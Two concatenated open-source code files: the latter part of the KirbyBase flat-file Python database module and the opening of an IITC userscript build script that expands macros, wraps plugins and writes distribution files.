out_file.write('|'.join(recs)+'\n')
out_file.close()
# copy temporary file into old file
shutil.copyfile(temp_name,name)
# delete temporary file
os.remove(temp_name)
return True
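    # Hedged example (field names assumed from the docstring examples):
    # insert a crew count column right after the country column:
    #
    #   db.addFields('plane.tbl', ['crew:int'], after='country')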
#----------------------------------------------------------------------
# dropFields
#----------------------------------------------------------------------
def dropFields(self, name, fields, after = ''):
"""Modify the table to drop the specified fields
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to drop.
A temporary file is created, then copied into the old file
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.dropFields('%s',%s)" %(name,fields))
# Validate the fields
if 'recno' in fields:
raise KBError("Can't drop the field 'recno'")
field_names = self.getFieldNames(name)
for field in fields:
if field not in field_names:
raise KBError('Invalid field name : %s' %field)
# build the modified fields list
old_fields = zip(field_names,self.getFieldTypes(name))
new_fields = []
dropped_indeces = []
for i,(n,t) in enumerate(old_fields[1:]):
if not n in fields:
if t.__name__ in ['date','datetime']:
new_fields.append('%s:datetime.%s' %(n,t.__name__))
else:
new_fields.append('%s:%s' %(n,t.__name__))
else:
dropped_indeces.append(i+1)
# Use tempfile to get a unique name for a temporary file
# to insert the records of the modified table
temp_file=tempfile.NamedTemporaryFile()
temp_name=temp_file.name
temp_file.close()
# Recreate the header rec to go into the temp file.
header_rec = list(['%06d' % self.last_recno,
'%06d' % self.del_counter, 'recno:int'] + new_fields)
# copy old table into temporary one
in_file = open(name,'r')
in_file.readline() # skip first line
out_file = open(temp_name,'a')
# Write header rec to new file.
out_file.write('|'.join(header_rec) + '\n')
# build the new file faster than with selects from old file
# and inserts in new one
for line in in_file:
recs = line[:-1].split('|')
new_recs = [ item for (i,item) in enumerate(recs) \
if not i in dropped_indeces]
out_file.write('|'.join(new_recs)+'\n')
out_file.close()
# copy temporary file into old file
shutil.copyfile(temp_name,name)
# delete temporary file
os.remove(temp_name)
return True
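    # Hedged example (field name assumed): remove the range column:
    #
    #   db.dropFields('plane.tbl', ['range'])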
#----------------------------------------------------------------------
# len
#----------------------------------------------------------------------
def len(self, name):
'''Return total number of non-deleted records in specified table
Arguments:
name - physical file name, including path, that holds table.
Returns total number of records in table.
'''
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.len('%s')" %(name))
# Initialize counter.
rec_count = 0
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Skip header record.
line = fptr.readline()
# Loop through entire table.
line = fptr.readline()
while line:
# Strip off newline character.
line = line[0:-1]
# If not blank line, add 1 to record count.
if line.strip() != "": rec_count += 1
# Read next record.
line = fptr.readline()
# Close the table.
self._closeTable(fptr)
return rec_count
#----------------------------------------------------------------------
# setDefaultReturnType
#----------------------------------------------------------------------
def setDefaultReturnType(self, ret_type):
"""Set the default return type for selects.
"""
if ret_type not in ['list', 'dict', 'object', 'report']:
raise KBError('Invalid return type: %s' % ret_type)
self.def_return_type = ret_type
#----------------------------------------------------------------------
# PRIVATE METHODS
#----------------------------------------------------------------------
#----------------------------------------------------------------------
# _strToBool
#----------------------------------------------------------------------
def _strToBool(self, boolString):
if boolString == 'True': return True
elif boolString == 'False': return False
else: raise KBError('Invalid value for boolean: %s' % boolString)
#----------------------------------------------------------------------
# _strToDate
#----------------------------------------------------------------------
def _strToDate(self, dateString):
# Split the date string up into pieces and create a
# date object.
return datetime.date(*map(int, dateString.split('-')))
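        # Sketch of the conversion this performs (value illustrative):
        #   '1944-06-06' -> datetime.date(1944, 6, 6)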
#----------------------------------------------------------------------
# _strToDateTime
#----------------------------------------------------------------------
def _strToDateTime(self, dateTimeString):
        # Split datetime string into a datetime portion and a
        # microseconds portion.
tempDateTime = dateTimeString.split('.')
        # Were there microseconds in the datetime string?
if len(tempDateTime) > 1: microsec = int(tempDateTime[1])
else: microsec = 0
# Now, split the datetime portion into a date
# and a time string. Take all of the pieces and
# create a datetime object.
tempDate, tempTime = tempDateTime[0].split(' ')
y, m, d = tempDate.split('-')
h, min, sec = tempTime.split(':')
return datetime.datetime(int(y),int(m),int(d),int(h),int(min),
int(sec),microsec)
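        # Sketch of the conversion this performs (value illustrative):
        #   '2005-01-30 13:45:02.000123'
        #       -> datetime.datetime(2005, 1, 30, 13, 45, 2, 123)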
#----------------------------------------------------------------------
# _encodeString
#----------------------------------------------------------------------
def _encodeString(self, s):
'''Encode a string.
Translates problem characters like \n, \r, and \032 to benign
character strings.
Keyword Arguments:
s - string to encode.
Returns encoded string.
'''
if self.encodeRegExp.search(s):
s = s.replace('\n', '&linefeed;')
s = s.replace('\r', '&carriage_return;')
s = s.replace('\032', '&substitute;')
s = s.replace('|', '&pipe;')
return s
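        # Round-trip sketch (value illustrative): _encodeString('a|b\nc')
        # returns 'a&pipe;b&linefeed;c', and _unencodeString reverses it.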
#----------------------------------------------------------------------
# _unencodeString
#----------------------------------------------------------------------
def _unencodeString(self, s):
'''Unencode a string.
Translates encoded character strings back to special characters
like \n, \r, \032.
Keyword Arguments:
s - string to unencode.
Returns unencoded string.
'''
if self.unencodeRegExp.search(s):
s = s.replace('&linefeed;', '\n')
s = s.replace('&carriage_return;', '\r')
s = s.replace('&substitute;', '\032')
s = s.replace('&pipe;', '|')
return s
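    # Illustrative round trip, assuming encodeRegExp/unencodeRegExp match
    # these characters:
    #   _encodeString('a|b\nc')                -> 'a&pipe;b&linefeed;c'
    #   _unencodeString('a&pipe;b&linefeed;c') -> 'a|b\nc'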
#----------------------------------------------------------------------
# _updateHeaderVars
#----------------------------------------------------------------------
def _updateHeaderVars(self, fptr):
# Go to the header record and read it in.
fptr.seek(0)
line = fptr.readline()
# Chop off the newline character.
line = line[0:-1]
# Split the record into fields.
header_rec = line.split('|')
# Update Last Record Number and Deleted Records counters.
self.last_recno = int(header_rec[0])
self.del_counter = int(header_rec[1])
# Skip the recno counter, and the delete counter.
header_fields = header_rec[2:]
# Create an instance variable holding the field names.
self.field_names = [item.split(':')[0] for item in header_fields]
# Create an instance variable holding the field types.
self.field_types = [self.strToTypes[x.split(':')[1]] for x in
header_fields]
        # The functions used to convert string values back into their
        # native types.
        convTypes = {int: int, float: float, bool: self._strToBool,
                     str: self._unencodeString,
                     datetime.date: self._strToDate,
                     datetime.datetime: self._strToDateTime}
        self.convert_types_functions = [convTypes[f] for f in
                                        self.field_types]
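        # For reference, a header line as parsed above looks roughly like
        # (illustrative; the exact type tokens depend on strToTypes):
        #   000012|000003|recno:int|name:str|joined:date
        # i.e. last recno used, delete counter, then name:type pairs.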
#----------------------------------------------------------------------
# _validateMatchCriteria
#----------------------------------------------------------------------
def _validateMatchCriteria(self, fields, patterns):
"""Run various checks against list of fields and patterns to be
used as search criteria. This method is called from all public
methods that search the database.
"""
if len(fields) == 0:
raise KBError('Length of fields list must be greater ' +
'than zero.')
if len(fields) != len(patterns):
raise KBError('Length of fields list and patterns list ' +
'not the same.')
# If any of the list of fields to search on do not match a field
# in the table, raise an error.
for field, pattern in zip(fields, patterns):
if field not in self.field_names:
raise KBError('Invalid field name in fields list: %s'
%field)
            # If the field is recno, make sure they are not trying to
            # search on more than one field. Also, make sure they are
            # either trying to match all records or that it is an integer.
if field == 'recno':
if len(fields) > 1:
raise KBError('If selecting by recno, no other ' +
'selection criteria is allowed')
if pattern != '*':
# check if all specified recnos are integers
if not isinstance(pattern,(tuple,list)):
pattern = [pattern]
for x in pattern:
if not isinstance(x,int):
raise KBError('Recno argument %s has type %s'
', expected an integer' %(x,type(x)))
continue
            # If the field type is not a str or a bool, make sure the
            # pattern you are searching on has a proper comparison
            # operator (<, <=, >, >=, ==, !=, or <>) in it.
            if (self.field_types[self.field_names.index(field)] in
                [int, float, datetime.date, datetime.datetime]):
                r = re.search(r'[\s]*[\+-]?\d', pattern)
                if r is None:
                    raise KBError('Invalid comparison syntax: %s' % pattern)
                if pattern[:r.start()] not in self.cmpFuncs:
                    raise KBError('Invalid comparison syntax: %s'
                                  % pattern[:r.start()])
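        # Example (hypothetical): fields=['age'], patterns=['>=21'] passes
        # these checks, while fields=['recno', 'age'] raises KBError because
        # recno may only be searched on by itself.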
#----------------------------------------------------------------------
#_convertInput
#----------------------------------------------------------------------
def _convertInput(self, values):
"""If values is a dictionary or an object, we are going to convert
it into a list. That way, we can use the same validation and
updating routines regardless of whether the user passed in a
dictionary, an object, or a list.
"""
# If values is a list, make a copy of it.
if isinstance(values, list): record = list(values)
        # If values is a dictionary, convert its values into a list
# corresponding to the table's field names. If there is not
# a key in the dictionary corresponding to a field name, place a
# '' in the list for that field name's value.
elif isinstance(values, dict):
record = [values.get(k,'') for k in self.field_names[1:]]
# If values is a record object, then do the same thing for it as
# you would do for a dictionary above.
else:
record = [getattr(values,a,'') for a in self.field_names[1:]]
        # Return the new list with all None items replaced by ''.
        new_rec = []
        for r in record:
            if r is None:
                new_rec.append('')
            else:
                new_rec.append(r)
        return new_rec
#----------------------------------------------------------------------
# _validateUpdateCriteria
#----------------------------------------------------------------------
def _validateUpdateCriteria(self, updates, filter):
"""Run various checks against list of updates and fields to be
used as update criteria. This method is called from all public
methods that update the database.
"""
if len(updates) == 0:
raise KBError('Length of updates list must be greater ' +
'than zero.')
if len(updates) != len(filter):
raise KBError('Length of updates list and filter list ' +
'not the same.')
# Since recno is the record's primary key and is system
# generated, like an autoincrement field, do not allow user
# to update it.
if 'recno' in filter:
raise KBError("Cannot update value of 'recno' field.")
# Validate filter list.
self._validateFilter(filter)
# Make sure each update is of the proper type.
for update, field_name in zip(updates, filter):
if update in ['', None]: pass
elif type(update) != self.field_types[
self.field_names.index(field_name)]:
raise KBError("Invalid update value for %s" % field_name)
#----------------------------------------------------------------------
# _validateFilter
#----------------------------------------------------------------------
def _validateFilter(self, filter):
# Each field in the filter list must be a valid field in the table.
for field in filter:
if field not in self.field_names:
raise KBError('Invalid field name: %s' % field)
#----------------------------------------------------------------------
# _getMatches
#----------------------------------------------------------------------
def _getMatches(self, fptr, fields, patterns, useRegExp):
# Initialize a list to hold all records that match the search
# criteria.
match_list = []
        # If one of the fields to search on is 'recno', which is the
        # table's primary key, then search just on that field and return
        # only the records whose record numbers match.
if 'recno' in fields:
return self._getMatchByRecno(fptr,patterns)
# Otherwise, search table, using all search fields and patterns
# specified in arguments lists.
else:
new_patterns = []
fieldNrs = [self.field_names.index(x) for x in fields]
for fieldPos, pattern in zip(fieldNrs, patterns):
if self.field_types[fieldPos] == str:
# If useRegExp is True, compile the pattern to a
# regular expression object and add it to the
# new_patterns list. Otherwise, just add it to
# the new_patterns list. This will be used below
# when matching table records against the patterns.
if useRegExp:
new_patterns.append(re.compile(pattern))
# the pattern can be a tuple with re flags like re.I
else:
new_patterns.append(pattern)
elif self.field_types[fieldPos] == bool:
# If type is boolean, I am going to coerce it to be
# either True or False by applying bool to it. This
# is because it could be '' or []. Next, I am going
# to convert it to the string representation: either
# 'True' or 'False'. The reason I do this is because
# that is how it is stored in each record of the table
# and it is a lot faster to change this one value from
# boolean to string than to change possibly thousands
# of table values from string to boolean. And, if they
# both are either 'True' or 'False' I can still
# compare them using the equality test and get the same
# result as if they were both booleans.
new_patterns.append(str(bool(pattern)))
else:
                    # If type is int, float, date, or datetime, this next
                    # bit of code will split the comparison string
                    # into the string representing the comparison
                    # operator (i.e. ">=") and the actual value we are
                    # going to compare the table records against from the
                    # input pattern (i.e. "5"). So, for example, ">5"
                    # would be split into ">" and "5".
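                    # For instance (illustrative), pattern ">=10" yields
                    # r.start() at the index of the first digit, so
                    # pattern[:r.start()] is ">=" and pattern[r.start():]
                    # is "10".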
                    r = re.search(r'[\s]*[\+-]?\d', pattern)
if self.field_types[fieldPos] == int:
patternValue = int(pattern[r.start():])
elif self.field_types[fieldPos] == float:
patternValue = float(pattern[r.start():])
else:
patternValue = pattern[r.start():]
new_patterns.append(
[self.cmpFuncs[pattern[:r.start()]], patternValue]
)
fieldPos_new_patterns = zip(fieldNrs, new_patterns)
maxfield = max(fieldNrs)+1
# Record current position in table. Then read first detail
# record.
fpos = fptr.tell()
line = fptr.readline()
# Loop through entire table.
while line:
# Strip off newline character and any trailing spaces.
line = line[:-1].strip()
try:
# If blank line, skip this record.
if line == "": raise KBnomatch('No Match : blank line')
# Split the line up into fields.
record = line.split("|", maxfield)
                    # For each corresponding field and pattern, check to
                    # see if the table record's field matches successfully.
for fieldPos, pattern in fieldPos_new_patterns:
# If the field type is string, it
# must be an exact match or a regular expression,
# so we will compare the table record's field to it
# using either '==' or the regular expression
# engine. Since it is a string field, we will need
# to run it through the unencodeString function to
# change any special characters back to their
# original values.
if self.field_types[fieldPos] == str:
try:
if useRegExp:
if not pattern.search(
self._unencodeString(record[fieldPos])
):
                                        raise KBnomatch('No match: regexp')
else:
if record[fieldPos] != pattern:
                                        raise KBnomatch('No match: string equality')
except KBnomatch:
raise # we raise the same KBnomatch again
except Exception:
raise KBError(
'Invalid match expression for %s'
% self.field_names[fieldPos])
# If the field type is boolean, then I will simply
# do an equality comparison. See comments above
# about why I am actually doing a string compare
# here rather than a boolean compare.
elif self.field_types[fieldPos] == bool:
if record[fieldPos] != pattern:
raise KBnomatch('No Match : boolean')
# If it is not a string or a boolean, then it must
# be a number or a date.
else:
                            # Convert the table's field value, which is a
                            # string, back into its native type so that
                            # we can do the comparison.
if record[fieldPos] == '':
tableValue = None
elif self.field_types[fieldPos] == int:
tableValue = int(record[fieldPos])
elif self.field_types[fieldPos] == float:
tableValue = float(record[fieldPos])
# I don't convert datetime values from strings
# back into their native types because it is
# faster to just leave them as strings and
# convert the comparison value that the user
# supplied into a string. Comparing the two
# strings works out the same as comparing two
# datetime values anyway.
elif self.field_types[fieldPos] in (
datetime.date, datetime.datetime):
tableValue = record[fieldPos]
else:
# If it falls through to here, then,
# somehow, a bad field type got put into
# the table and we show an error.
raise KBError('Invalid field type for %s'
% self.field_names[fieldPos])
# Now we do the actual comparison. I used to
# just do an eval against the pattern string
# here, but I found that eval's are VERY slow.
# So, now I determine what type of comparison
# they are trying to do and I do it directly.
# This sped up queries by 40%.
if not pattern[0](tableValue, pattern[1]):
                                raise KBnomatch('No match: comparison failed')
# If a 'No Match' exception was raised, then go to the
# next record, otherwise, add it to the list of matches.
except KBnomatch:
pass
else:
match_list.append([line, fpos])
# Save the file position BEFORE we read the next record,
# because after a read it is pointing at the END of the
# current record, which, of course, is also the BEGINNING
# of the next record. That's why we have to save the
# position BEFORE we read the next record.
fpos = fptr.tell()
line = fptr.readline()
# After searching, return the list of matched records.
return match_list
#----------------------------------------------------------------------
# _getMatchByRecno
#----------------------------------------------------------------------
def _getMatchByRecno(self, fptr, recnos):
"""Search by recnos. recnos is a list, containing '*', an integer, or
a list or tuple of integers"""
# Initialize table location marker and read in first record
# of table.
fpos = fptr.tell()
line = fptr.readline()
if recnos == ['*']:
            # Take all the non-blank lines.
            while line:
                # Strip off the newline character.
                line = line[0:-1]
if line.strip():
yield [line,fpos]
fpos = fptr.tell()
line = fptr.readline()
else:
# select the records with record number in recnos
if isinstance(recnos[0],(tuple,list)):
# must make it a list, to be able to remove items
recnos = list(recnos[0])
while line:
                # Strip off the newline character.
                line = line[0:-1]
# If line is not blank, split it up into fields.
if line.strip():
record = line.split("|")
# If record number for current record equals record number
# we are searching for, add it to match list
if int(record[0]) in recnos:
yield [line, fpos]
recnos.remove(int(record[0]))
# if no more recno to search, stop looping
if not recnos: break
# update the table location marker
# and read the next record.
fpos = fptr.tell()
line = fptr.readline()
# Stop iteration
return
#----------------------------------------------------------------------
# _incrRecnoCounter
#----------------------------------------------------------------------
def _incrRecnoCounter(self, fptr):
# Save where we are in the table.
last_pos = fptr.tell()
# Go to header record and grab header fields.
fptr.seek(0)
line = fptr.readline()
header_rec = line[0:-1].split('|')
# Increment the recno counter.
self.last_recno += 1
header_rec[0] = "%06d" %(self.last_recno)
        # Write the header record back to the file.
self._writeRecord(fptr, 0, '|'.join(header_rec))
# Go back to where you were in the table.
fptr.seek(last_pos)
# Return the newly incremented recno counter.
return self.last_recno
#----------------------------------------------------------------------
# _incrDeleteCounter
#----------------------------------------------------------------------
def _incrDeleteCounter(self, fptr):
# Save where we are in the table.
last_pos = fptr.tell()
# Go to header record and grab header fields.
fptr.seek(0)
line = fptr.readline()
header_rec = line[0:-1].split('|')
# Increment the delete counter.
self.del_counter += 1
header_rec[1] = "%06d" %(self.del_counter)
# Write the header record back to the file.
self._writeRecord(fptr, 0, '|'.join(header_rec))
# Go back to where you were in the table.
fptr.seek(last_pos)
#----------------------------------------------------------------------
# _deleteRecord
#----------------------------------------------------------------------
def _deleteRecord(self, fptr, pos, record):
# Move to record position in table.
fptr.seek(pos)
# Overwrite record with all spaces.
self._writeRecord(fptr, pos, " " * len(record))
#----------------------------------------------------------------------
# _writeRecord
#----------------------------------------------------------------------
def _writeRecord(self, fptr, pos, record):
try:
# If record is to be appended, go to end of table and write
# record, adding newline character.
if pos == 'end':
fptr.seek(0, 2)
fptr.write(record + '\n')
else:
# Otherwise, move to record position in table and write
# record.
fptr.seek(pos)
fptr.write(record)
except:
raise KBError('Could not write record to: ' + fptr.name)
#----------------------------------------------------------------------
# _openTable
#----------------------------------------------------------------------
def _openTable(self, name, access):
try:
# Open physical file holding table.
fptr = open(name, access)
except:
raise KBError('Could not open table: ' + name)
# Return handle to physical file.
return fptr
#----------------------------------------------------------------------
# _closeTable
#----------------------------------------------------------------------
def _closeTable(self, fptr):
try:
# Close the file containing the table.
fptr.close()
except:
raise KBError('Could not close table: ' + fptr.name)
#----------------------------------------------------------------------
# _sendSocket
#----------------------------------------------------------------------
def _sendSocket(self, command):
dbSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dbSock.connect((self.host, self.port))
self.dbSock = dbSock
        # Send the length of the command followed by the command itself.
        # sendall is used so a partial send cannot truncate the request.
        dbSock.sendall('%16s%s' % (len(command), command))
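        # Wire format, mirroring the receive loop below: a 16-character,
        # space-padded length field followed by the raw command text.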
# Receive the return value of the method.
data = ''
while len(data) < 16:
data = data + dbSock.recv(1024)
recv_length = int(data[:16])
data = data[16:]
while len(data) < recv_length:
data = data + dbSock.recv(1024)
        # Convert pickled binary data back into its original format
        # (usually a list).
data = cPickle.loads(data[:recv_length])
# If the server passed back an error object, re-raise that error
# here on the client side, otherwise, just return the data to the
# caller.
if isinstance(data, Exception):
raise data
else:
return data
#--------------------------------------------------------------------------
# Generic class for records
#--------------------------------------------------------------------------
class Record(object):
"""Generic class for record objects.
Public Methods:
__init__ - Create an instance of Record.
"""
#----------------------------------------------------------------------
# init
#----------------------------------------------------------------------
def __init__(self,names,values):
self.__dict__ = dict(zip(names, values))
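    # Example (hypothetical): Record(['recno', 'name'], [1, 'Bob']) yields
    # an object r with r.recno == 1 and r.name == 'Bob'.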
#--------------------------------------------------------------------------
# KBError Class
#--------------------------------------------------------------------------
class KBError(Exception):
"""Exception class for Database Management System.
Public Methods:
__init__ - Create an instance of exception.
"""
#----------------------------------------------------------------------
# init
#----------------------------------------------------------------------
def __init__(self, value):
self.value = value
def __str__(self):
        return repr(self.value)
# I overrode repr so I could pass error objects from the server to the
# client across the network.
def __repr__(self):
format = """KBError("%s")"""
return format % (self.value)
#--------------------------------------------------------------------------
# KBnomatch Class
# Added to avoid the string exceptions that have been deprecated.
#--------------------------------------------------------------------------
class KBnomatch(Exception):
"""Exception class for Database Management System.
Public Methods:
__init__ - Create an instance of exception.
"""
def __init__(self, value):
self.value = value
#print self.value
def __str__(self):
        return repr(self.value)
# Don't know if I need this, but anyway.
def __repr__(self):
format = """KBnomatch("%s")"""
return format % (self.value)
| COSMOGRAIL/COSMOULINE | pipe/modules/kirbybase.py | Python | gpl-3.0 | 92,500 |
#!/usr/bin/env python
# Modification History
# 01/28/2017 Add jsdoc2md and some print statements to trace what's going on. Brian S Hayes (Hayeswise)
# 02/04/2017 Add if exists check around distribution file rather than use try block. Brian S Hayes (Hayeswise)
import glob
import time
import re
import io
import base64
import sys
import os
import shutil
import json
import shelve
import hashlib
import subprocess
from datetime import datetime
#try:
# import jsmin
#except ImportError:
# print ("Not able to import jsmin")
try:
import urllib2
except ImportError:
import urllib.request as urllib2
# load settings file
from buildsettings import buildSettings
# load option local settings file
try:
from localbuildsettings import buildSettings as localBuildSettings
buildSettings.update(localBuildSettings)
except ImportError:
pass
# load default build
try:
from localbuildsettings import defaultBuild
except ImportError:
defaultBuild = None
buildName = defaultBuild
clean = False
verbose = False
# build name from command line
if len(sys.argv) >= 2: # argv[0] = program, argv[1] = buildname, len=2
buildName = sys.argv[1]
if len(sys.argv) >= 3: # argv[0] = program, argv[1] = buildname, option
    for option in sys.argv:
        if option == "-verbose" or option == "--verbose":
            verbose = True
        if option == "-clean" or option == "--clean":
            clean = True
if buildName is None or not buildName in buildSettings:
print ("Usage: build.py buildname [--verbose] [--clean]")
print (" available build names: %s" % ', '.join(buildSettings.keys()))
print (" if --clean, the files will not be built.")
sys.exit(1)
# set up vars used for replacements
utcTime = time.gmtime()
buildDate = time.strftime('%Y-%m-%d-%H%M%S',utcTime)
# userscripts have specific specifications for version numbers - the above date format doesn't match
dateTimeVersion = time.strftime('%Y%m%d.',utcTime) + time.strftime('%H%M%S',utcTime).lstrip('0')
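# For example (illustrative): 2017-02-04 01:02:03 UTC gives buildDate
# '2017-02-04-010203' and dateTimeVersion '20170204.10203' (the leading
# zero of the time portion is stripped).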
verbose and print("IITC build, dateTimeVersion=" + dateTimeVersion + ", buildDate=" + buildDate)
verbose and print ("Get buildSettings[" + buildName + "]")
if buildName in buildSettings:
settings = buildSettings[buildName]
# extract required values from the settings entry
resourceUrlBase = settings.get('resourceUrlBase')
distUrlBase = settings.get('distUrlBase')
buildMobile = settings.get('buildMobile')
antOptions = settings.get('antOptions','')
    antBuildFile = settings.get('antBuildFile', 'mobile/build.xml')
# plugin wrapper code snippets. handled as macros, to ensure that
# 1. indentation caused by the "function wrapper()" doesn't apply to the plugin code body
# 2. the wrapper is formatted correctly for removal by the IITC Mobile android app
pluginWrapperStart = """
function wrapper(plugin_info) {
// ensure plugin framework is there, even if iitc is not yet loaded
if(typeof window.plugin !== 'function') window.plugin = function() {};
//PLUGIN AUTHORS: writing a plugin outside of the IITC build environment? if so, delete these lines!!
//(leaving them in place might break the 'About IITC' page or break update checks)
plugin_info.buildName = '@@BUILDNAME@@';
plugin_info.dateTimeVersion = '@@DATETIMEVERSION@@';
plugin_info.pluginId = '@@PLUGINNAME@@';
//END PLUGIN AUTHORS NOTE
"""
pluginWrapperStartUseStrict = pluginWrapperStart.replace("{\n", "{\n\"use strict\";", 1).replace("function", ";function", 1)
pluginWrapperEnd = """
setup.info = plugin_info; //add the script info data to the function as a property
if(!window.bootPlugins) window.bootPlugins = [];
window.bootPlugins.push(setup);
// if IITC has already booted, immediately run the 'setup' function
if(window.iitcLoaded && typeof setup === 'function') setup();
} // wrapper end
// inject code into site context
var script = document.createElement('script');
var info = {};
if (typeof GM_info !== 'undefined' && GM_info && GM_info.script) info.script = {version: GM_info.script.version, name: GM_info.script.name, description: GM_info.script.description };
script.appendChild(document.createTextNode('('+ wrapper +')('+JSON.stringify(info)+');'));
(document.body || document.head || document.documentElement).appendChild(script);
"""
def lastModText(datetimestamp):
return "does not exist." if datetimestamp == 0 else ("was last modified on " + (str(datetime.fromtimestamp(datetimestamp))))
def readfile(fn):
    with io.open(fn, 'r', encoding='utf8') as f:
return f.read()
def loaderString(var):
fn = var.group(1)
return readfile(fn).replace('\n', '\\n').replace('\'', '\\\'')
def loaderRaw(var):
fn = var.group(1)
return readfile(fn)
def loaderMD(var):
fn = var.group(1)
# use different MD.dat's for python 2 vs 3 incase user switches versions, as they are not compatible
db = shelve.open('build/MDv' + str(sys.version_info[0]) + '.dat')
if 'files' in db:
files = db['files']
else:
files = {}
file = readfile(fn)
filemd5 = hashlib.md5(file.encode('utf8')).hexdigest()
# check if file has already been parsed by the github api
if fn in files and filemd5 in files[fn]:
# use the stored copy if nothing has changed to avoid hitting the api more then the 60/hour when not signed in
db.close()
return files[fn][filemd5]
else:
url = 'https://api.github.com/markdown'
payload = {'text': file, 'mode': 'markdown'}
headers = {'Content-Type': 'application/json'}
req = urllib2.Request(url, json.dumps(payload).encode('utf8'), headers)
md = urllib2.urlopen(req).read().decode('utf8').replace('\n', '\\n').replace('\'', '\\\'')
files[fn] = {}
files[fn][filemd5] = md
db['files'] = files
db.close()
return md
def loaderImage(var):
fn = var.group(1)
    return 'data:image/png;base64,{0}'.format(base64.b64encode(open(fn, 'rb').read()).decode('utf8'))
def loadCode(ignore):
return '\n\n;\n\n'.join(map(readfile, sorted(glob.glob('code/*.js'))))
def extractUserScriptMeta(var):
m = re.search ( r"//[ \t]*==UserScript==\n.*?//[ \t]*==/UserScript==\n", var, re.MULTILINE|re.DOTALL )
return m.group(0)
def latestDependencyModTime(script):
# TODO add something for INJECTCODE
    patterns = ['@@INCLUDERAW:([0-9a-zA-Z_./-]+)@@', '@@INCLUDESTRING:([0-9a-zA-Z_./-]+)@@', '@@INCLUDEMD:([0-9a-zA-Z_./-]+)@@', '@@INCLUDEIMAGE:([0-9a-zA-Z_./-]+)@@']
groupLastModDate = 0
for pattern in patterns:
files = re.findall(pattern,script)
for file in files:
lastModDate = os.path.getmtime(file)
verbose and print (" dependency " + file + " " + lastModText(lastModDate))
if lastModDate > groupLastModDate:
groupLastModDate = lastModDate
return groupLastModDate
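# For example (illustrative), a script containing
# '@@INCLUDERAW:images/icon.png@@' makes images/icon.png a dependency whose
# modification time is folded into the value returned above.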
def doReplacements(script,updateUrl,downloadUrl,pluginName=None):
script = re.sub('@@INJECTCODE@@',loadCode,script)
script = script.replace('@@PLUGINSTART@@', pluginWrapperStart)
script = script.replace('@@PLUGINSTART-USE-STRICT@@', pluginWrapperStartUseStrict)
script = script.replace('@@PLUGINEND@@', pluginWrapperEnd)
script = re.sub('@@INCLUDERAW:([0-9a-zA-Z_./-]+)@@', loaderRaw, script)
script = re.sub('@@INCLUDESTRING:([0-9a-zA-Z_./-]+)@@', loaderString, script)
script = re.sub('@@INCLUDEMD:([0-9a-zA-Z_./-]+)@@', loaderMD, script)
script = re.sub('@@INCLUDEIMAGE:([0-9a-zA-Z_./-]+)@@', loaderImage, script)
script = script.replace('@@BUILDDATE@@', buildDate)
script = script.replace('@@DATETIMEVERSION@@', dateTimeVersion)
if resourceUrlBase:
script = script.replace('@@RESOURCEURLBASE@@', resourceUrlBase)
else:
if '@@RESOURCEURLBASE@@' in script:
raise Exception("Error: '@@RESOURCEURLBASE@@' found in script, but no replacement defined")
script = script.replace('@@BUILDNAME@@', buildName)
script = script.replace('@@UPDATEURL@@', updateUrl)
script = script.replace('@@DOWNLOADURL@@', downloadUrl)
    if pluginName:
        script = script.replace('@@PLUGINNAME@@', pluginName)
return script
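# For instance (illustrative), a source line '// @version @@DATETIMEVERSION@@'
# comes back from doReplacements() as '// @version 20170204.10203' for the
# example timestamp above.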
def saveScriptAndMeta(script, outDir, filename):
fn = os.path.join(outDir,filename)
with io.open(fn, 'w', encoding='utf8') as f:
f.write(script)
metafn = fn.replace('.user.js', '.meta.js')
if metafn != fn:
with io.open(metafn, 'w', encoding='utf8') as f:
meta = extractUserScriptMeta(script)
f.write(meta)
# Set directory values and create directories if missing
cwd = os.getcwd()
buildRoot = os.path.join(cwd, 'build')
docRoot = os.path.join(cwd, "docs")
distRoot = os.path.join(cwd, 'dist')
outDir = os.path.join(buildRoot, buildName)
if clean:
verbose and print ("Cleaning directories")
for d in [outDir, distRoot]: #docRoot TODO: need to handle images
if os.path.exists(d):
verbose and print(" " + d)
for d, dirs, files in os.walk(d): # Thanks to rejax at http://stackoverflow.com/questions/36267807/python-recursively-remove-files-folders-in-a-directory-but-not-the-parent-direc
for name in files:
try:
os.remove(os.path.join(d,name))
except:
print(" Error:", sys.exec_info()[0])
for name in dirs:
try:
shutil.rmtree(os.path.join(d,name))
except:
print(" Error:", sys.exec_info()[0])
for d, dirs, files in os.walk(buildRoot):
for name in files:
try:
os.remove(os.path.join(d,name))
except:
print(" Error:", sys.exec_info()[0])
    sys.exit(1)
if not os.path.exists(buildRoot):
os.mkdir(buildRoot)
if not os.path.exists(outDir):
os.mkdir(outDir)
if not os.path.exists(distRoot):
os.mkdir(distRoot)
if not os.path.isdir(docRoot):
os.mkdir(os.path.join(cwd, "docs"))
# see if jsdoc2md is installed for JSDoc
jsdoc2md = shutil.which("jsdoc2md")
jsdocFiles = []
# run any preBuild commands
for cmd in settings.get('preBuild',[]):
os.system ( cmd )
# load main.js, parse, and create main total-conversion-build.user.js
main = readfile('main.js')
downloadUrl = distUrlBase and distUrlBase + '/total-conversion-build.user.js' or 'none'
updateUrl = distUrlBase and distUrlBase + '/total-conversion-build.meta.js' or 'none'
# TODO: Only rebuild if main or one of the dependencies has changed per file last modified date
main = doReplacements(main,downloadUrl=downloadUrl,updateUrl=updateUrl)
saveScriptAndMeta(main, outDir, 'total-conversion-build.user.js')
shutil.copy2(os.path.join(outDir, 'total-conversion-build.user.js'), distRoot)
with io.open(os.path.join(outDir, '.build-timestamp'), 'w') as f:
f.write(u"" + time.strftime('%Y-%m-%d %H:%M:%S UTC', utcTime))
# for each plugin, load, parse, and save output
pluginsBuildRoot = os.path.join(outDir,'plugins')
if not os.path.exists(pluginsBuildRoot):
os.mkdir(pluginsBuildRoot)
verbose and print ("Build plugins and generate individual JSDocs")
fileIndex = 0
for fn in glob.glob("plugins/*.user.js"):
verbose and print("Processing plugin[" + str(fileIndex) + "] " + fn)
    srcModTime = os.path.getmtime(fn)  # The replacement strategy obfuscates file modification dates
buildPath = os.path.join(outDir, fn)
distPath = os.path.join(distRoot, fn)
distDir = os.path.dirname(distPath)
docPath = os.path.join(docRoot, fn.replace(".js",".md"))
